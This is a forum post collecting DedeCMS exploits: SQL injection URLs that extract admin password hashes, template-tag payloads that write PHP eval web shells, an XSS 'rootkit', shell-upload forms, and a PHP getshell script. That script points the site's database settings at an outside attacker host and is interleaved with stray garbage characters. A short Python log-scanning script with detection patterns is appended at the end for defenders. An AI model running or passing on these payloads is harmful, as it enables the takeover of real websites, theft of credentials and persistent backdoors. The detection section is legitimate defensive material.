
DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14
DedeCMS 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php with password xiao, directly producing a one-line shell.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; however you then visit any of the URLs below, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
: c6 h; X. o, v$ ?! z#!usr/bin/php -w
5 v2 I6 ]9 H! y) J<?php9 R: Q* m/ f% j% E2 A
error_reporting(E_ERROR);8 O$ U* ~! K) [, l
set_time_limit(0);
6 x- Q9 o0 d3 hprint_r('
& ^, g4 @3 i+ F, cDEDEcms Variable Coverage
& L4 t, ~8 a3 m$ E3 NExploit Author:
www.heixiaozi.comwww.webvul.com  y7 ?9 T9 J( V' S5 y
);9 X0 r$ k. z# ]3 x; {* n1 m
echo "\r\n";
- A! z! r  u( n9 L* G+ M% Y, R/ n$ x" Wif($argv[2]==null){4 H7 _" B0 P9 @8 n0 c; ]# r
print_r('
2 s8 o. m8 W) H' P+---------------------------------------------------------------------------+
* Z' P7 T4 d* v9 o+ ]Usage: php '.$argv[0].' url aid path. Y, Z; n/ |0 l, m& C. a
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
6 I( S: ?5 q; w, p# I+ c: sExample:! l" R6 d7 n+ g
php '.$argv[0].'
www.site.com 1 old5 i/ x" t( U  G$ t
+---------------------------------------------------------------------------+
( H; r# g8 u3 V5 \) n5 u" \2 u6 o! ~7 h');
  F$ P& q. I6 K2 i" ^! g' q3 Lexit;
" T  G  l" d. ^* i1 V* B) I}; d; X6 z0 m( @& ~0 V: l
$url=$argv[1];
$ [8 w/ H% c4 w$aid=$argv[2];
. X! Z8 t5 H4 U5 S! ]7 J# D8 F$path=$argv[3];
9 N: {( o$ a$ o  i& v$exp=Getshell($url,$aid,$path);
' C. W8 ~/ P; lif (strpos($exp,"OK")>12){
% x/ P9 L! i. Zecho "
& L1 i8 ?( `) H) S/ |Exploit Success \n";
9 `' X' o& Y- m7 kif($aid==1)echo "
' j  }  W; A  F5 V4 k% ]Shell:".$url."/$path/data/cache/fuck.php\n" ;
+ g9 |4 S1 v( R0 W( p
) I' q2 g8 A( \
8 ~- f5 @. f+ _$ C% cif($aid==2)echo "
3 ^( y0 d# h' R8 a% ]/ I" a( @Shell:".$url."/$path/fuck.php\n" ;5 ]1 {( i/ ]  P

  t( k7 O- r  s5 D0 P
+ J0 f7 l6 z1 h% y- [! @if($aid==3)echo "
- F' `( g* @6 N) P+ }3 R, `* g% IShell:".$url."/$path/plus/fuck.php\n";+ v! P4 b) c. R
) d/ B; v) q$ o( O. ?* V1 r7 N

$ q  O: z* k( c/ l. x6 n; s}else{7 U  T2 E, M2 P1 \" Y) L
echo "- D4 r6 F0 ]4 G( N
Exploit Failed \n";3 i; z. v' m4 P
}
: ~, e4 W$ E7 C9 G! z" z3 G( [function Getshell($url,$aid,$path){
, j* L* }9 x9 ?( Y! g$id=$aid;
5 _' H* h& Q6 J$host=$url;4 R" C4 W7 O, |* z& `% v9 Y9 I
$port="80";- k0 ?' V) s# j; X" b% d) V& c0 g7 b
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
; B$ n0 Z- a/ w/ g; a$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
1 b, _8 a1 D* I, M$data .= "Host: ".$host."\r\n";
1 P( r. F7 U7 ~9 K( N# h. D) a  S$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$ K6 _8 Z0 n7 ~6 `
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";6 `! o3 M+ @6 v$ s3 G) O+ e7 v
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
  m" [8 m4 J; _+ P# e: U. z//$data .= "Accept-Encoding: gzip,deflate\r\n";# f  _; W; {; u, s) O. V( ^% Q3 G
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";. {3 C9 n8 a/ O6 G- m
$data .= "Connection: keep-alive\r\n";
$ |7 Y# f  i, P+ Y6 \) B& e$data .= "Content-Type: application/x-www-form-urlencoded\r\n";% `- ?! ~; l7 x  l" K, {' V% r. s
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
2 k- Q+ F8 P$ \* C9 g$data .= $content."\r\n";
9 ]& m; y: W% S; l: E$ock=fsockopen($host,$port);
! q; a0 h7 b! ~  b) dif (!$ock) {
3 J( o: v3 Y; n$ z: aecho "7 x$ a8 x) [: L) i0 @' p- t0 O
No response from ".$host."\n";
: [) m5 |3 ?5 h+ ~* V8 e# c6 F+ i}
6 h3 A& c* s! D. J# n+ Efwrite($ock,$data);
4 y1 O. T) j" p3 n3 Awhile (!feof($ock)) {
7 B# y, Q# p% k( }; P7 @7 G$exp=fgets($ock, 1024);
( ]0 X' K, T2 R% k) A8 d( Dreturn $exp;
- s3 k8 F) b! j+ x: z/ \- ?}2 M- E5 s1 A& y% V: {
}' v7 \) t) a4 V+ \

$ E2 _7 {8 W% |. d0 S6 d$ q' U% r2 \) d2 \2 E
?>. a9 K: k. D" r- [! J: N2 y( x

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value, and you can go straight into the site backend.
The precondition of this vulnerability is that the backend path must be obtained first.
' A3 t3 K7 A% [& A1 N# V, J0 a
( X1 Y- q" X) X7 T  n* G# t
, w( V0 H* D1 o4 T/ @
8 \: p- D6 y1 S  B. t) b* _" \
8 v# S3 ~: H8 A7 _4 D- c/ s
# _" [7 p2 e$ [5 `, f
! v+ }1 m! p6 _. V5 _: K' v" i2 t; q4 z3 |

DedeCMS (织梦) tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}, and after publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php, password: xiao, directly producing a one-line shell. Password xiao, you all know what that means.
DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image, then in attachment management replace the image with our carefully crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
6 y* B4 Y3 b! Y9 E# z: T<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
2 \& ]$ H7 c  {<input type="hidden" name="dopost" value="save" />7 w4 A/ c* {* N4 H- _6 c, I
<input type="hidden" name="aid" value="2" />
$ z; |; B) V* V<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />1 ~3 E6 P. q8 R* V7 ~9 ^$ N
<input type="hidden" name="channelid" value="1" />4 }5 ^- x/ R. k& ]( l# X! W, C5 O0 E
<input type="hidden" name="oldlitpic" value="" />% s8 s* f  l& k" B; ^
<input type="hidden" name="sortrank" value="1275972263" />
7 A  g* {! q* h
: a" t2 ^# s* V3 U0 [; ]4 ?7 Z% A
& V7 |- V3 b$ [3 v: y$ U<div id="mainCp">  P! Q2 g% q& Y( J
<h3 class="meTitle"><strong>修改文章</strong></h3>4 C. _# y1 O2 b  y; _. ?
% |( T, Q/ W9 j* ]) ]" \
$ D7 K. g. W; A% F, G4 e4 @$ ^
<div class="postForm">
+ E  A0 [7 i. T, w<label>标题:</label>
5 D( `( a/ e& K, ]% M, n<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>3 W/ z! E" P' r" B
; x7 v3 |3 z) [5 [9 R, O  W+ M

* d; G8 _2 I: `# H6 K6 s* B<label>标签TAG:</label>
8 t" M) {. F* o7 d$ E0 R; ?<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
9 n0 s: s% z1 F$ A# f! U- |
/ ?2 C5 E5 \/ f% A
1 `8 d9 T( Q5 \0 T$ N+ @8 x: N9 Y<label>作者:</label>
1 {: c4 _; N3 O- _' S$ [6 b<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
* N2 f; K+ \% q/ A& x9 p- {: e
2 X& h6 q# H( \" a* k9 T4 d! h4 K, [$ R9 L6 M. q. I6 B
<label>隶属栏目:</label>
- |  A% W( m4 x3 X& t5 T( [<select name='typeid' size='1'>- {8 e7 k. l+ b1 p5 p' d6 N
<option value='1' class='option3' selected=''>测试栏目</option>
) c1 A8 t! G) S) f6 x</select> <span style="color:#F00">*</span>(不能选择带颜色的分类), x5 Y6 e0 w" D1 K
, p2 V% ?! `9 t* [, q9 t
3 k9 T: C/ o  e6 @' s
<label>我的分类:</label>
' u# A& M# y$ `; F<select name='mtypesid' size='1'>
' V5 m5 |3 \- R6 p, N<option value='0' selected>请选择分类...</option>
! `- k/ e% v. H& T" t" z<option value='1' class='option3' selected>hahahha</option>
$ z9 p) g% w3 O</select>
9 h4 E2 g) x: P0 |4 b) K) G3 A
& [% ^0 _# [! C! u1 }: f( b' B
1 N! w$ T# x) \6 X( A3 ~4 f<label>信息摘要:</label>
/ B4 x7 i. h) P( a<textarea name="description" id="description">1111111</textarea>
2 r: a- e. S4 U9 X- l9 M7 M(内容的简要说明)
3 q  G1 ~% d  A3 l: u( p" M* R' ?: l9 E3 h7 `
4 U; w) G( v2 w# E; h. ]+ v' c+ |
<label>缩略图:</label>3 |9 g: Z$ k1 n% F2 [/ ^
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
4 B, ~3 F9 H) U% |% D! K
9 {) a* m2 D8 G$ l. [6 z8 o1 y8 @% O9 A  @( v0 E
<input type='text' name='templet'
, S0 v% J0 U9 @7 g, ~4 d) ivalue="../ uploads/userup/2/12OMX04-15A.jpg">
& }6 x. g) F  [8 |<input type='text' name='dede_addonfields'4 m7 K+ ]" W, r" |# T
value="templet,htmltext;">(这里构造)1 o5 ]/ r& `; a9 b9 r- Y8 K
</div>
8 u8 p, [5 q( W& t7 s  }2 i0 v8 E# R! b8 y5 G( ~( r; ?% r

0 A) b: J- G* }5 J, h+ d<!-- 表单操作区域 -->
3 ^; s+ f1 \% `3 x<h3 class="meTitle">详细内容</h3>5 g6 d  t% R- k8 z; S2 j% K
2 H! l6 _/ S$ X  A1 K( b
% `7 |0 [) I/ P& i
<div class="contentShow postForm">+ h. E6 Z4 o% ^( z' X" ~
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 p6 |# M8 h3 O% ~2 I7 [, V3 r
0 o9 B) M9 M# p# K

5 J: m, Q: Y0 F<label>验证码:</label>
' p& D; S/ ~4 T8 H7 U<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
. L! z  E% s2 b<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
6 f; B) Z1 ^' L
- ^# v0 I7 b0 {8 L$ E* S/ U( p/ W( l8 ^  v
<button class="button2" type="submit">提交</button>
6 N9 ?# Y- `2 P, J1 R) P<button class="button2 ml10" type="reset">重置</button>
* a0 e, w) M. Q; u  P4 V</div>+ S- v$ @2 d5 Y9 m) O

. a% L% W) [5 a, n
( E. Z  h  e2 m  U- ~</div>
7 `6 C, [' k3 }, o/ u. ^
2 ?( m; s/ h( r) D$ D4 \# T' \; k+ Y/ i4 |
</form>+ ]2 p+ z% U3 [* Y3 t

Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (DedeCMS) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (DedeCMS) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; the method then is to drop 3 from the front and 1 from the end to get the 16-character MD5.

织梦 (DedeCMS) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (DedeCMS) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (DedeCMS) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
Exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages to a PHP file whose header performs no validation.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
You can see the error message.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCMS) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
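Added here as a defender-side example (not part of the original post and not DedeCMS code): a small Python access-log triage script that URL-decodes each request target and flags the request patterns the payloads above rely on (GLOBALS config overrides, {dede:} tags, updatexml/UNION/raw-SQL parameters, ../ traversal, PHP or <script> inside parameters, hits on data/mysql_error_trace.php). The log lines, addresses and rule names are constructed; POST bodies do not appear in access logs, so the _COOKIE[GLOBALS] form payloads are only visible here when sent in the query string or at a proxy that logs bodies.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# (name, pattern) pairs run against the URL-decoded query string. Each one
# maps to a payload family collected in the post above.
QUERY_RULES = [
    # _COOKIE[GLOBALS][cfg_*] / _POST[GLOBALS][cfg_*]: mytag_js.php, login.php
    ("globals_override", re.compile(r"(?:^|&)_(?:COOKIE|POST|GET|REQUEST)\[GLOBALS\]", re.I)),
    # {dede:...} tags pushed into a field: toby57 / runphp payloads
    ("template_tag", re.compile(r"\{/?dede:", re.I)),
    # error-based extraction: rss.php
    ("sql_error_based", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    # UNION extraction: feedback_js.php, infosearch.php
    ("sql_union", re.compile(r"\bunion\b.{0,60}\bselect\b", re.I | re.S)),
    # whole statement in the sql parameter: advancedsearch.php
    ("raw_sql_param", re.compile(r"(?:^|&)sql=\s*(?:select|insert|update|delete)\b", re.I)),
    # quote juggling of the GBK payload: member/index.php
    ("sql_quote_chain", re.compile(r"'\s*(?:\|\||or)\s*'", re.I)),
    # ../ in a file parameter: edit_face.php, carbuyaction.php
    ("path_traversal", re.compile(r"\.\./")),
    # PHP source inside a parameter: digg_frame.php error-log trick
    ("php_in_param", re.compile(r"<\?php|\?>|\beval\s*\(", re.I)),
    # reflected XSS: gotopage
    ("script_tag", re.compile(r"<script\b", re.I)),
]
# Run against the request path: the error-trace file the digg_frame.php trick
# turns into PHP, and PHP served out of the cache dir (select_soft_post.php).
PATH_RULES = [
    ("error_trace_access", re.compile(r"/data/mysql_error_trace\.php$", re.I)),
    ("cache_php_access", re.compile(r"/data/cache/[^/]+\.php$", re.I)),
]

def decode(s, rounds=2):
    """URL-decode repeatedly so double-encoded payloads are matched in clear."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s

def scan_target(target):
    """Return the sorted rule names that fire for one request target."""
    path, _, query = target.partition("?")
    hits = {name for name, rx in PATH_RULES if rx.search(decode(path))}
    q = decode(query)
    hits.update(name for name, rx in QUERY_RULES if rx.search(q))
    return sorted(hits)

def scan_log(lines):
    """Parse combined-format lines; return (ip, target, hits) per flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the sweep
        hits = scan_target(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings

# Constructed sample log (RFC 5737 addresses); targets mirror the payloads above.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 2310
198.51.100.7 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 88
198.51.100.8 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9120
198.51.100.7 - - [18/Oct/2012:10:43:30 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3E HTTP/1.1" 200 1200
198.51.100.7 - - [18/Oct/2012:10:44:02 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 40
198.51.100.7 - - [18/Oct/2012:10:44:40 +0800] "POST /data/mysql_error_trace.php HTTP/1.1" 200 12
198.51.100.7 - - [18/Oct/2012:10:45:00 +0800] "GET /member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B'' HTTP/1.1" 200 3000
"""
```

Running scan_log(SAMPLE_LOG.splitlines()) flags six of the seven constructed requests (the plain view.php hit stays clean); tune the rules to the site before using them for alerting, since a benign search form can legitimately carry a single quote.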